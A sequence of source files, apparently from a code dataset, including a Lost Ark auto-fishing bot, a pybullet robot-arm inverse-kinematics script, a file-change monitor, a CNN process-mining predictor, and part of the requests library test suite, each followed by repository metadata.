    location = fi.findImageUntil(imgName, startPos=startPos, cnt=cnt,
                                 confidence=confidence, wait=wait)
    if location == None:
        return False
    pa.press(key)
    return True
# - Main auto-fishing function -
def fishingLostArk(wait, setPos=1, fishingKey='w'):
    """Main auto-fishing loop.

    wait       -- seconds to idle after a successful catch
    setPos     -- 0: pick three points with the mouse; otherwise load the
                  per-spot points saved in init.txt
    fishingKey -- keyboard key that casts/reels the line
    """
    fishingFailCnt = 0
    posList = []
    # Pick three points by moving the mouse (key-confirmed).
    if setPos == 0:
        posList = fp.getMousePointWithKey(3)
    # Otherwise load the per-fishing-spot points from init.txt.
    else:
        posList = fp.getFishingPointList()
    print('point of init : ', str(posList))
    # Detection-region size stored in init_config.py.
    width = FISHING_WIDTH
    height = FISHING_HEIGHT
    # Repeat auto-fishing forever.
    while True:
        # Stop the program after more than 20 accumulated failures.
        if fishingFailCnt > 20:
            print("Fishing Too Much Fail")
            return
        if len(posList) > 0:
            idx = random.randrange(0, len(posList))
            # idx = fising_cnt % 3
            pa.moveTo(posList[idx][0], posList[idx][1], 1)
        else:
            print("Can't get fishing point")
            return
        pa.press(fishingKey)
        time.sleep(1)
        # Screen region in which to detect the exclamation mark (bite cue).
        region = fi.makeRegion(fi.getCenterOfScreen(), width, height)
        res = findImgAndPressKey(FISHING_EXCLAMATION_MARK_IMG_NAME, fishingKey, startPos=region,
                                 cnt=FISHING_EXCLAMATION_MARK_DETECT_CNT, confidence=0.8, wait=0.1)
        if res == True:
            print('Fishing Success')
            time.sleep(wait)
            # A success slowly pays down the failure counter.
            if fishingFailCnt > 0:
                fishingFailCnt -= 1
        else:
            print('fishing Fail')
            fishingFailCnt += 1
            time.sleep(2)
if __name__ == "__main__":
fishingLostArk(FISHING_WAIT_TIME, setPos=1, fishingKey='w')
|
[
"noreply@github.com"
] |
hyeokju1313.noreply@github.com
|
6fa5daef7a5999fbaf0e98abc0fd6ca6b28c067e
|
79ea92ddeae7aa912a57ee1b8262daf30f6b8a59
|
/test.py
|
ef45751f51e5322c9bd4a7b50794f00fe4983019
|
[] |
no_license
|
gn3112/roboenv_pybullet
|
25a5d5f066f8cbd60fb434548750961a2b295016
|
da18bff3b69e5aaee886932ef05176d1aeb4b87e
|
refs/heads/master
| 2021-04-08T12:03:21.065414
| 2020-07-18T14:48:33
| 2020-07-18T14:48:33
| 248,774,031
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,071
|
py
|
import pybullet_data
import pybullet as p
import time
import math
from datetime import datetime
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def reset():
    """Put every Kuka joint back at its rest pose (uses module globals)."""
    for joint_index in range(numJoints):
        p.resetJointState(kukaId, joint_index, rp[joint_index])
def add_object():
    """Create a static (massless) 2x2x2 box body at z=1; return its body id."""
    half_extents = [1, 1, 1]
    visual_id = p.createVisualShape(p.GEOM_BOX, halfExtents=half_extents,
                                    collisionFramePosition=[0, 0, 0])
    collision_id = p.createCollisionShape(p.GEOM_BOX, halfExtents=half_extents)
    return p.createMultiBody(baseMass=0,
                             baseCollisionShapeIndex=collision_id,
                             baseVisualShapeIndex=visual_id,
                             basePosition=[0, 0, 1])
# --- Scene setup: headless server, ground plane, fixed-base Kuka iiwa ------
#clid = p.connect(p.SHARED_MEMORY)
print(p.__file__)
p.connect(p.DIRECT)
p.setAdditionalSearchPath(pybullet_data.getDataPath()) #optionally
p.loadURDF("plane.urdf", [0, 0, -0.3], useFixedBase=True)
kukaId = p.loadURDF("kuka_iiwa/model.urdf", [0, 0, 0], useFixedBase=True)
quater = p.getQuaternionFromEuler([0,0,0])
p.resetBasePositionAndOrientation(kukaId, [0, 0, 0], quater)
kukaEndEffectorIndex = 6
numJoints = p.getNumJoints(kukaId)
# Sanity check: the iiwa model must expose exactly 7 joints.
if (numJoints != 7):
  exit()
#lower limits for null space
ll = [-.967, -2, -2.96, 0.19, -2.96, -2.09, -3.05]
#upper limits for null space
ul = [.967, 2, 2.96, 2.29, 2.96, 2.09, 3.05]
#joint ranges for null space
jr = [5.8, 4, 5.8, 4, 5.8, 4, 6]
#restposes for null space
rp = [0, 0, 0, 0.5 * math.pi, 0, -math.pi * 0.5 * 0.66, 0]
#joint damping coefficents
jd = [0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1]
# Start every joint at its rest pose.
for i in range(numJoints):
  p.resetJointState(kukaId, i, rp[i])
p.setGravity(0, 0, -10)
t = 0.
prevPose = [0, 0, 0]
prevPose1 = [0, 0, 0]
hasPrevPose = 0
useNullSpace = 0
count = 0
useOrientation = 1
useSimulation = 1
trailDuration = 15
# Log generic robot state and contact points to files.
logId1 = p.startStateLogging(p.STATE_LOGGING_GENERIC_ROBOT, "LOG0001.txt", [0, 1, 2])
logId2 = p.startStateLogging(p.STATE_LOGGING_CONTACT_POINTS, "LOG0002.txt", bodyUniqueIdA=2)
# for i in range(5):
#     print("Body %d's name is %s." % (i, p.getBodyInfo(i)[1]))
# Camera looking at the origin from (0, 1.5, 1.5).
viewMatrix = p.computeViewMatrix(cameraEyePosition=[0,1.5,1.5],
                                 cameraTargetPosition=[0,0,0],
                                 cameraUpVector=[0,1,0])
projectionMatrix = p.computeProjectionMatrixFOV(
    fov=45.0,
    aspect=1.0,
    nearVal=0.1,
    farVal=3.1)
# plotting world and camera reference frame
# NOTE(review): assumes the 16-float view matrix is grouped into 4-element
# rows here; the inverse-transpose maps camera-frame axis vectors back to
# world coordinates for plotting — confirm the row/column convention.
viewMatrix_arr = np.array([viewMatrix[i-4:i] for i in range(4,20,4)])
u1 = np.matmul(np.linalg.inv(viewMatrix_arr).T,np.array([1,0,0,1]))
u2 = np.matmul(np.linalg.inv(viewMatrix_arr).T,np.array([0,1,0,1]))
u3 = np.matmul(np.linalg.inv(viewMatrix_arr).T,np.array([0,0,1,1]))
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
# World axes at the origin (red=x, green=y, blue=z).
ax.plot([0,1],[0,0],[0,0],color='r')
ax.plot([0,0],[0,1],[0,0],color='g')
ax.plot([0,0],[0,0],[0,1],color='b')
# Camera axes drawn from the eye position.
ax.plot([0,u1[0]],[1.5,u1[1]],[1.5,u1[2]],color='r')
ax.plot([0,u2[0]],[1.5,u2[1]],[1.5,u2[2]],color='g')
ax.plot([0,u3[0]],[1.5,u3[1]],[1.5,u3[2]],color='b')
plt.show()
img = p.getCameraImage(width=256, height=256, viewMatrix=viewMatrix, projectionMatrix=projectionMatrix)
# Control loop: track a point slightly offset (+0.05 on y) from the current
# end-effector pose via inverse kinematics.
while 1:
    ls = p.getLinkState(kukaId, kukaEndEffectorIndex)
    # ls[4] is the link frame world position.
    endEffectorPos = [ls[4][i] for i in range(3)]
    endEffectorPos[1] = endEffectorPos[1] + 0.05
    orn = p.getQuaternionFromEuler([0, -math.pi, 0])
    jointPoses = p.calculateInverseKinematics(kukaId, kukaEndEffectorIndex, endEffectorPos, orn, ll, ul,
                                              jr, rp)
    p.stepSimulation()
    # Fixed: the original referenced an undefined ``self`` at module level,
    # had a malformed comprehension (``for in range(...)`` — SyntaxError),
    # and passed singular keyword names where the *Array variant of the API
    # takes per-joint lists (jointIndices/targetPositions/forces/...).
    p.setJointMotorControlArray(bodyIndex=kukaId,
                                jointIndices=list(range(numJoints)),
                                controlMode=p.POSITION_CONTROL,
                                targetPositions=[jointPoses[i] for i in range(numJoints)],
                                forces=[500] * numJoints,
                                positionGains=[0.03] * numJoints,
                                velocityGains=[1] * numJoints)
    # if (hasPrevPose):
    #     p.addUserDebugLine(prevPose, pos, [0, 0, 0.3], 1, trailDuration)
    #     p.addUserDebugLine(prevPose1, ls[4], [1, 0, 0], 1, trailDuration)
[
"georgesnomicos@gmail.com"
] |
georgesnomicos@gmail.com
|
16dd9d855bb41709fb9316c23fa04e01066c48a3
|
85120b4f57a5c930d9d229a2368f6db151bd4610
|
/support/monitor.py
|
1fd0a183e6e498987c249cca1515d3eee7e9d685
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
egpbos/amuse
|
1f0501d636b5029b22ac01bbad85cfa94ab8b244
|
64b3bc5b7fef9496012b023578c4d71cecef92b7
|
refs/heads/master
| 2020-03-21T12:35:51.671246
| 2018-06-27T12:10:28
| 2018-06-27T12:10:28
| 138,561,660
| 0
| 0
|
Apache-2.0
| 2018-06-25T07:55:19
| 2018-06-25T07:55:18
| null |
UTF-8
|
Python
| false
| false
| 4,976
|
py
|
import time
import urlparse
import threading
import traceback
import json
import nose
import sys
import linecache
import inspect
import os.path
import BaseHTTPServer
import SocketServer
import Queue as queue
from mpi4py import MPI
from nose.plugins.capture import Capture
from nose.plugins.skip import Skip, SkipTest
from nose.core import TestProgram
from multiprocessing import Process, Queue
from optparse import OptionParser
from subprocess import call, Popen, PIPE
from StringIO import StringIO
class MonitoredFile(object):
    """A single file tracked by modification time.

    ``container`` is the owning collection (anything exposing ``remove``);
    the file unregisters itself from it when deleted or unreadable.
    """

    def __init__(self, path, container):
        self.path = path
        self.container = container
        # Baseline mtime; -1 when the file cannot be stat'ed.
        self.timestamp = self.get_last_modification_time()

    def is_file(self):
        return True

    def check(self, monitor):
        """Re-stat the file and report exactly one outcome to *monitor*.

        Calls monitor.deleted / errored / updated / unchanged, removing
        the file from its container when it is gone or unreadable.
        """
        if not os.path.exists(self.path):
            self.container.remove(self)
            monitor.deleted(self)
            return

        measured_timestamp = self.get_last_modification_time()
        if measured_timestamp < 0:
            # Raced with a delete/permission change between exists() and stat().
            self.container.remove(self)
            monitor.errored(self)
            return

        if self.timestamp < measured_timestamp:
            self.timestamp = measured_timestamp
            monitor.updated(self)
            return

        monitor.unchanged(self)

    def get_last_modification_time(self):
        """Return the file's mtime, or -1 when it cannot be stat'ed."""
        try:
            statinfo = os.stat(self.path)
            return statinfo.st_mtime
        except OSError:
            # Fixed: was a bare ``except:`` that swallowed every exception
            # (including KeyboardInterrupt); only stat failures belong here.
            return -1

    def walk(self, monitor):
        monitor.found(self)
class MonitoredDirectory(object):
    """A directory tree tracked recursively for create/update/delete events.

    ``container`` is the parent MonitoredDirectory (None for a root).
    """
    def __init__(self, path, container = None):
        self.path = path
        self.elements = []
        self.container = container
        # Fast path -> element lookup used when detecting new entries.
        self.path_to_element = {}
        self.setup_from_filesystem()

    def is_file(self):
        return False

    def setup_from_filesystem(self):
        # Snapshot the current directory entries; symlinks are skipped
        # (avoids cycles and duplicate coverage).
        names = os.listdir(self.path)
        for name in names:
            path = os.path.join(self.path, name)
            if os.path.islink(path):
                continue
            element = self.new_element(path)
            self.elements.append(element)
            self.path_to_element[path] = element

    def new_element(self, path):
        # Factory: subdirectories recurse, everything else is a file node.
        if os.path.isdir(path):
            return MonitoredDirectory(path, self)
        else:
            return MonitoredFile(path, self)

    def remove(self, element):
        self.elements.remove(element)
        del self.path_to_element[element.path]

    def check(self, monitor):
        """Recursively re-scan, reporting deletions, changes and new entries."""
        if not os.path.exists(self.path):
            if not self.container is None:
                self.container.remove(self)
            monitor.deleted(self)
            return

        # NOTE(review): children call self.remove(...) from inside their own
        # check(), mutating self.elements while it is being iterated — this
        # can skip the element after a removed one; iterate a copy instead.
        for x in self.elements:
            x.check(monitor)

        # Pick up entries created since the last scan.
        names = os.listdir(self.path)
        for name in names:
            path = os.path.join(self.path, name)
            if not path in self.path_to_element:
                element = self.new_element(path)
                monitor.created(element)
                self.elements.append(element)
                self.path_to_element[path] = element

    def walk(self, monitor):
        # Depth-first visit of this directory and everything below it.
        monitor.found(self)
        for x in self.elements:
            x.walk(monitor)
class MonitorDirectories(object):
    """Change aggregator + monitor-callback sink over several root paths.

    Only ``*.py`` files whose basename does not start with '.' are
    considered (see must_monitor_file).  This module is Python 2 code
    (print statement in errored()).
    """
    def __init__(self, paths):
        # NOTE(review): ``map`` would be a one-shot lazy iterator on
        # Python 3; under Python 2 this is a list, which check()/walk()
        # rely on being re-iterable.
        self.elements = map(lambda x : MonitoredDirectory(x), paths)
        self.changed = False
        self.updated_elements = []

    def check(self):
        """Re-scan all roots; sets self.changed and self.updated_elements."""
        self.changed = False
        self.updated_elements = []
        for x in self.elements:
            x.check(self)

    def deleted(self, monitored_element):
        if not self.must_monitor_file(monitored_element):
            return
        self.changed = True

    def created(self, monitored_element):
        if not self.must_monitor_file(monitored_element):
            return
        self.changed = True

    def unchanged(self, monitored_element):
        pass

    def errored(self, monitored_element):
        # Best-effort report; the element has already unregistered itself.
        print "error while monitoring file: ", monitored_element.path
        pass

    def updated(self, monitored_element):
        if not self.must_monitor_file(monitored_element):
            return
        self.changed = True
        self.updated_elements.append(monitored_element)

    def walk(self, callback_function):
        """Visit every monitored element, invoking *callback_function* on
        each one that passes the file filter (via found())."""
        self.callback_function = callback_function
        for x in self.elements:
            x.walk(self)

    def found(self, monitored_element):
        if not self.must_monitor_file(monitored_element):
            return
        self.callback_function(monitored_element)

    def must_monitor_file(self, monitored_element):
        # Filter: Python sources only, skipping hidden files.
        return (
            monitored_element.path.endswith('.py') and
            not os.path.basename(monitored_element.path).startswith('.')
        )
|
[
"vanelteren@6e832d89-e7d1-4ad1-8ca1-873beecccf65"
] |
vanelteren@6e832d89-e7d1-4ad1-8ca1-873beecccf65
|
a2e5f01eb71ec11ddd0fcbda3516cb82caec5dcb
|
8a932874900d869626a05aa49d2ecbe6394b70e3
|
/RelatedMethods/Pasquadibisceglie/adapter.py
|
1618dae83d9dbc0edd9f8fccfa2288a1adb7c4a6
|
[] |
no_license
|
guptam/edbn
|
253918f38c3651fa459ab795946d3656240232ba
|
e54a6678582a620c12848185c56251d1209631f7
|
refs/heads/master
| 2022-11-29T11:55:02.548888
| 2020-08-05T10:02:12
| 2020-08-05T10:02:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,799
|
py
|
from datetime import datetime
import pandas as pd
import numpy as np
import multiprocessing as mp
from functools import partial
from Utils.LogFile import LogFile
seed = 123
np.random.seed(seed)
def get_label(act):
    """Collect next-activity labels from a single-column DataFrame of traces.

    For every trace (a sequence stored in column 0) this gathers the events
    at positions 2..end — the prediction target for each prefix of length
    >= 2 — concatenated over all rows.
    """
    list_label = []
    for row_idx in range(len(act)):
        trace = act.iat[row_idx, 0]
        # The original loop appended trace[j + 1] for j = 1 .. len(trace) - 2,
        # which is exactly the slice trace[2:].
        list_label.extend(trace[2:])
    return list_label
def dataset_summary(dataset):
    """Load *dataset* (a CSV event log) and print basic statistics.

    Returns (df, max_trace, n_caseid, n_activity).
    """
    df = pd.read_csv(dataset, sep=",")
    print("Activity Distribution\n", df['event'].value_counts())
    n_caseid = df['case'].nunique()
    # NOTE(review): the distinct-activity count reads column 'Activity'
    # while every other statistic reads 'event' — confirm the expected
    # CSV schema actually has both columns.
    n_activity = df['Activity'].nunique()
    print("Number of CaseID", n_caseid)
    print("Number of Unique Activities", n_activity)
    print("Number of Activities", df['event'].count())
    # Trace length = number of events per case id.
    cont_trace = df['case'].value_counts(dropna=False)
    max_trace = max(cont_trace)
    print("Max lenght trace", max_trace)
    print("Mean lenght trace", np.mean(cont_trace))
    print("Min lenght trace", min(cont_trace))
    return df, max_trace, n_caseid, n_activity
def get_image(act_val, time_val, max_trace, n_activity):
    """Encode each trace prefix (length >= 2) as a (max_trace, n_activity, 2)
    image: channel 0 = cumulative activity counts, channel 1 = time offset
    from the trace start.  Prefix rows are bottom-aligned in the image.
    """
    i = 0
    matrix_zero = [max_trace, n_activity, 2]
    image = np.zeros(matrix_zero)
    list_image = []
    while i < len(time_val):
        j = 0
        list_act = []
        list_temp = []
        # Index 0 of conts/diffs is padding; only columns 1..n_activity
        # are kept via the [1:] slices below.
        conts = np.zeros(n_activity + 1)
        diffs = np.zeros(n_activity + 1)
        while j < (len(act_val.iat[i, 0]) - 1):
            start_trace = time_val.iat[i, 0][0]
            conts[act_val.iat[i, 0][0 + j]] += 1
            diffs[act_val.iat[i, 0][0 + j]] = time_val.iat[i, 0][0 + j] - start_trace
            # NOTE(review): conts[1:] / diffs[1:] are numpy *views* of arrays
            # that keep being mutated — by the time zip() reads them below,
            # every appended entry reflects the final state.  Confirm this
            # is intended (a .copy() here would snapshot each step).
            list_act.append(conts[1:])
            list_temp.append(diffs[1:])
            j = j + 1
        cont = 0
        lenk = len(list_act) - 1
        # Fill rows bottom-up so the newest prefix step sits in the last row.
        while cont <= lenk:
            image[(max_trace - 1) - cont] = np.array(list(zip(list_act[lenk - cont], list_temp[lenk - cont])))
            cont = cont + 1
        # One-step prefixes are skipped; otherwise store the finished image.
        if cont == 1:
            pass
        else:
            list_image.append(image)
            image = np.zeros(matrix_zero)
        i = i + 1
    return list_image
def get_image_from_log(log):
    """Build one (k, n_activity, 2) image per row of log.contextdata.

    Channel 0: cumulative count per activity over the k-step window;
    channel 1: seconds since the window's first timestamped event.
    """
    n_activity = len(log.values[log.activity])
    matrix_zero = (log.k, n_activity, 2)
    list_image = []
    for row in log.contextdata.iterrows():
        image = np.zeros(matrix_zero)
        # Index 0 is padding; columns 1..n_activity are kept via [1:].
        conts = np.zeros(n_activity + 1)
        diffs = np.zeros(n_activity + 1)
        starttime = None
        # Walk the window oldest (Prev{k-1}) to newest (Prev0).
        for i in range(log.k - 1, -1, -1):
            event = row[1]["%s_Prev%i" % (log.activity, i)]
            conts[event] += 1
            t_raw = row[1]["%s_Prev%i" % (log.time, i)]
            # 0 marks "no event" padding; otherwise parse one of the two
            # timestamp formats that occur in the data.
            if t_raw != 0:
                try:
                    t = datetime.strptime(t_raw, "%Y-%m-%d %H:%M:%S")
                except ValueError:
                    t = datetime.strptime(t_raw, "%Y/%m/%d %H:%M:%S.%f")
                if starttime is None:
                    starttime = t
                diffs[event] = (t - starttime).total_seconds()
            image[log.k - 1 - i] = np.array(list(zip(conts[1:], diffs[1:])))
        list_image.append(image)
    return list_image
def get_image_from_log2(log):
    """Parallel variant of get_image_from_log: builds the per-row images
    with a process pool (one worker per CPU)."""
    n_activity = len(log.values[log.activity])
    image_shape = (log.k, n_activity, 2)
    build_one = partial(create_image, matrix_zero=image_shape,
                        activity_attr=log.activity, time_attr=log.time)
    with mp.Pool(mp.cpu_count()) as pool:
        return pool.map(build_one, log.contextdata.iterrows())
def create_image(row, matrix_zero, activity_attr, time_attr):
    """Build one (k, n_activity, 2) snapshot image for a single log row.

    Channel 0 holds cumulative activity counts; channel 1 holds seconds
    elapsed since the first timestamped event in the window.
    """
    k, n_activity = matrix_zero[0], matrix_zero[1]
    image = np.zeros(matrix_zero)
    counts = np.zeros(n_activity + 1)
    elapsed = np.zeros(n_activity + 1)
    first_time = None
    # Walk the window oldest event (Prev{k-1}) first, newest (Prev0) last.
    for step, prev_idx in enumerate(range(k - 1, -1, -1)):
        event = row[1]["%s_Prev%i" % (activity_attr, prev_idx)]
        counts[event] += 1
        raw = row[1]["%s_Prev%i" % (time_attr, prev_idx)]
        # 0 marks "no event" padding; otherwise parse one of the two
        # timestamp formats seen in the data.
        if raw != 0:
            try:
                stamp = datetime.strptime(raw, "%Y-%m-%d %H:%M:%S")
            except ValueError:
                stamp = datetime.strptime(raw, "%Y/%m/%d %H:%M:%S.%f")
            if first_time is None:
                first_time = stamp
            elapsed[event] = (stamp - first_time).total_seconds()
        # Index 0 is a padding label, dropped from both channels.
        image[step] = np.array(list(zip(counts[1:], elapsed[1:])))
    return image
def get_label_from_log(log):
    """Return the target activity label of every row in log.contextdata."""
    return [entry[1][log.activity] for entry in log.contextdata.iterrows()]
def train(log, epochs=500, early_stop=42):
    """Train the CNN next-activity predictor on *log*; return the Keras model.

    epochs     -- maximum number of training epochs
    early_stop -- patience (epochs without val_loss improvement) before stopping
    """
    # Keras imports are function-local so the module can be imported
    # without TensorFlow installed.
    from keras.models import Sequential
    from keras.layers.core import Flatten, Dense
    from keras.layers.convolutional import MaxPooling2D
    from keras.optimizers import Nadam
    from keras.callbacks import EarlyStopping
    from keras.layers.normalization import BatchNormalization
    from keras.layers import Conv2D, Activation
    from keras import regularizers
    from keras.utils import np_utils

    X_train = get_image_from_log(log)
    y_train = get_label_from_log(log)

    X_train = np.asarray(X_train)
    y_train = np.asarray(y_train)
    # num_classes = #activities + 1 (index 0 is unused by real activities,
    # matching the padding column dropped in the image encoders).
    train_Y_one_hot = np_utils.to_categorical(y_train, len(log.values[log.activity]) + 1)

    trace_size = log.k
    n_activity = len(log.values[log.activity])

    #define neural network architecture
    model = Sequential()
    reg = 0.0001
    input_shape = (trace_size, n_activity, 2)
    model.add(Conv2D(32, (2, 2), input_shape=input_shape, padding='same', kernel_initializer='glorot_uniform',
                     kernel_regularizer=regularizers.l2(reg)))
    model.add(BatchNormalization())
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Conv2D(64, (4, 4), padding='same', kernel_regularizer=regularizers.l2(reg), ))
    model.add(BatchNormalization())
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # A third conv stage is only added for windows of at least 8 steps.
    if trace_size >= 8:
        model.add(Conv2D(128, (8, 8), padding='same', kernel_regularizer=regularizers.l2(reg), ))
        model.add(BatchNormalization())
        model.add(Activation('relu'))
        model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Flatten())
    model.add(Dense(len(log.values[log.activity]) + 1, activation='softmax', name='act_output'))

    print(model.summary())
    opt = Nadam(lr=0.0002, beta_1=0.9, beta_2=0.999, epsilon=1e-08, schedule_decay=0.004, clipvalue=3)
    model.compile(loss={'act_output': 'categorical_crossentropy'}, optimizer=opt, metrics=['accuracy'])
    # Stop early when validation loss stalls for *early_stop* epochs.
    early_stopping = EarlyStopping(monitor='val_loss', patience=early_stop)

    model.fit(X_train, {'act_output': train_Y_one_hot}, validation_split=0.2, verbose=1,
              callbacks=[early_stopping], batch_size=128, epochs=epochs)
    return model
def test(log, model):
    """Evaluate *model* on *log*; print and return the accuracy."""
    from keras.utils import np_utils
    X_test = get_image_from_log(log)
    y_test = get_label_from_log(log)

    X_test = np.asarray(X_test)
    y_test = np.asarray(y_test)
    # Same num_classes convention as in train(): #activities + 1.
    test_Y_one_hot = np_utils.to_categorical(y_test, len(log.values[log.activity]) + 1)
    # score = [loss, accuracy]
    score = model.evaluate(X_test, test_Y_one_hot, verbose=1)
    print('\nAccuracy on test data: ', score[1])
    return score[1]
if __name__ == "__main__":
    # Train/evaluate the model on the BPIC15 log with a 10-step window.
    data = "../../Data/BPIC15_1_sorted_new.csv"
    case_attr = "case"
    act_attr = "event"

    logfile = LogFile(data, ",", 0, None, "completeTime", case_attr,
                      activity_attr=act_attr, convert=False, k=10)
    logfile.convert2int()
    logfile.create_k_context()
    # 80/20 case-level train/test split.
    train_log, test_log = logfile.splitTrainTest(80, case=True, method="train-test")

    model = train(train_log, epochs=100, early_stop=10)
    # Fixed: was ``notest(test_log, model)`` — an undefined name; the
    # intent is clearly to evaluate with the test() function above.
    test(test_log, model)
|
[
"stephen.pauwels@uantwerpen.be"
] |
stephen.pauwels@uantwerpen.be
|
1ae7841129119b7eeb89b92cf92f35798bdce555
|
41647db5c90e05b523f51fecfa4e2cb1b3913775
|
/xin.py
|
3f7cb6d52710e622d3734bba8e16ee68bef59be6
|
[] |
no_license
|
jin6818236/shiyanlou-code
|
67baa2d7a33023ed1550ca88ba2ae28f5dce97fc
|
986cbdc6479d14ef6592f5e9d228fa6ae9601d1c
|
refs/heads/master
| 2022-07-13T10:54:47.734503
| 2020-05-16T14:38:21
| 2020-05-16T14:38:21
| 259,810,127
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26
|
py
|
# Print the book title (Chinese: "疯魔").
print('书名:疯魔')
|
[
"429405313@qq.com"
] |
429405313@qq.com
|
80577f2a674ed5988bf3a9c97803830f4a433fd2
|
b5c2a98fbd274a0aff49ca70d6fc3e4b26f4e1c5
|
/requests_tests/test_suite_29.py
|
1d163ef61c4ffac5ac4aa7b8fc5e34beb044639f
|
[] |
no_license
|
hughe1/SoftwareTestingResearch
|
3120dc857bcfc7acdbea1ef0fd071b3eb878cc81
|
66d69e7f8791a7b03be95a2d387c7ab452d9a209
|
refs/heads/master
| 2021-07-19T02:56:00.279534
| 2017-10-22T12:25:51
| 2017-10-22T12:25:51
| 108,536,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,974
|
py
|
# -*- coding: utf-8 -*-
"""Tests for Requests."""
from __future__ import division
import json
import os
import pickle
import collections
import contextlib
import warnings
import io
import requests
import pytest
from requests.adapters import HTTPAdapter
from requests.auth import HTTPDigestAuth, _basic_auth_str
from requests.compat import (
Morsel, cookielib, getproxies, str, urlparse,
builtin_str, OrderedDict)
from requests.cookies import (
cookiejar_from_dict, morsel_to_cookie)
from requests.exceptions import (
ConnectionError, ConnectTimeout, InvalidSchema, InvalidURL,
MissingSchema, ReadTimeout, Timeout, RetryError, TooManyRedirects,
ProxyError, InvalidHeader, UnrewindableBodyError, SSLError)
from requests.models import PreparedRequest
from requests.structures import CaseInsensitiveDict
from requests.sessions import SessionRedirectMixin
from requests.models import urlencode
from requests.hooks import default_hooks
# from .compat import StringIO, u
# from .utils import override_environ
from urllib3.util import Timeout as Urllib3Timeout
# Requests to this URL should always fail with a connection timeout (nothing
# listening on that port)
TARPIT = 'http://10.255.255.1'
try:
from ssl import SSLContext
del SSLContext
HAS_MODERN_SSL = True
except ImportError:
HAS_MODERN_SSL = False
try:
requests.pyopenssl
HAS_PYOPENSSL = True
except AttributeError:
HAS_PYOPENSSL = False
# -*- coding: utf-8 -*-
import threading
import socket
import time
import pytest
import requests
from testserver.server import Server
# -*- coding: utf-8 -*-
import pytest
from requests.structures import CaseInsensitiveDict, LookupDict
# -*- coding: utf-8 -*-
import os
import copy
from io import BytesIO
import pytest
from requests import compat
from requests.cookies import RequestsCookieJar
from requests.structures import CaseInsensitiveDict
from requests.utils import (
address_in_network, dotted_netmask,
get_auth_from_url, get_encoding_from_headers,
get_encodings_from_content, get_environ_proxies,
guess_filename, guess_json_utf, is_ipv4_address,
is_valid_cidr, iter_slices, parse_dict_header,
parse_header_links, prepend_scheme_if_needed,
requote_uri, select_proxy, should_bypass_proxies, super_len,
to_key_val_list, to_native_string,
unquote_header_value, unquote_unreserved,
urldefragauth, add_dict_to_cookiejar, set_environ)
from requests._internal_utils import unicode_is_ascii
# -*- encoding: utf-8
import sys
import pytest
from requests.help import info
class TestGuessFilename:
    """Unit tests for requests.utils.guess_filename."""

    @pytest.mark.parametrize(
        'value', (1, type('Fake', (object,), {'name': 1})()),
    )
    def test_guess_filename_invalid(self, value):
        # Objects without a usable string .name attribute yield None.
        assert guess_filename(value) is None

    @pytest.mark.parametrize(
        'value, expected_type', (
            (b'value', compat.bytes),
            (b'value'.decode('utf-8'), compat.str)
        ))
    def test_guess_filename_valid(self, value, expected_type):
        # The filename is taken verbatim from .name and keeps its type
        # (bytes stays bytes, text stays text).
        obj = type('Fake', (object,), {'name': value})()
        result = guess_filename(obj)
        assert result == value
        assert isinstance(result, expected_type)
def test_digestauth_401_count_reset_on_redirect():
    """Ensure we correctly reset num_401_calls after a successful digest auth,
    followed by a 302 redirect to another digest auth prompt.

    See https://github.com/requests/requests/issues/1979.
    """
    # Canned wire responses the fake server replays in order.
    text_401 = (b'HTTP/1.1 401 UNAUTHORIZED\r\n'
                b'Content-Length: 0\r\n'
                b'WWW-Authenticate: Digest nonce="6bf5d6e4da1ce66918800195d6b9130d"'
                b', opaque="372825293d1c26955496c80ed6426e9e", '
                b'realm="me@kennethreitz.com", qop=auth\r\n\r\n')

    text_302 = (b'HTTP/1.1 302 FOUND\r\n'
                b'Content-Length: 0\r\n'
                b'Location: /\r\n\r\n')

    text_200 = (b'HTTP/1.1 200 OK\r\n'
                b'Content-Length: 0\r\n\r\n')

    expected_digest = (b'Authorization: Digest username="user", '
                       b'realm="me@kennethreitz.com", '
                       b'nonce="6bf5d6e4da1ce66918800195d6b9130d", uri="/"')

    auth = requests.auth.HTTPDigestAuth('user', 'pass')

    # NOTE(review): consume_socket_content is not imported in this chunk —
    # presumably a testserver helper; confirm it is in scope in the full file.
    def digest_response_handler(sock):
        # Respond to initial GET with a challenge.
        request_content = consume_socket_content(sock, timeout=0.5)
        assert request_content.startswith(b"GET / HTTP/1.1")
        sock.send(text_401)

        # Verify we receive an Authorization header in response, then redirect.
        request_content = consume_socket_content(sock, timeout=0.5)
        assert expected_digest in request_content
        sock.send(text_302)

        # Verify Authorization isn't sent to the redirected host,
        # then send another challenge.
        request_content = consume_socket_content(sock, timeout=0.5)
        assert b'Authorization:' not in request_content
        sock.send(text_401)

        # Verify Authorization is sent correctly again, and return 200 OK.
        request_content = consume_socket_content(sock, timeout=0.5)
        assert expected_digest in request_content
        sock.send(text_200)

        return request_content

    close_server = threading.Event()
    server = Server(digest_response_handler, wait_to_close_event=close_server)

    with server as (host, port):
        url = 'http://{0}:{1}/'.format(host, port)
        r = requests.get(url, auth=auth)
        # Verify server succeeded in authenticating.
        assert r.status_code == 200
        # Verify Authorization was sent in final request.
        assert 'Authorization' in r.request.headers
        assert r.request.headers['Authorization'].startswith('Digest ')
        # Verify redirect happened as we expected.
        assert r.history[0].status_code == 302
        close_server.set()
def hook(value):
    """Test helper hook: return *value* with its first element removed."""
    trimmed = value[1:]
    return trimmed
class TestIsIPv4Address:
    """Unit tests for requests.utils.is_ipv4_address."""

    def test_valid(self):
        assert is_ipv4_address('8.8.8.8')

    @pytest.mark.parametrize('value', ('8.8.8.8.8', 'localhost.localdomain'))
    def test_invalid(self, value):
        # Too many octets / hostnames are not dotted-quad IPv4 addresses.
        assert not is_ipv4_address(value)
class TestCaseInsensitiveDict:
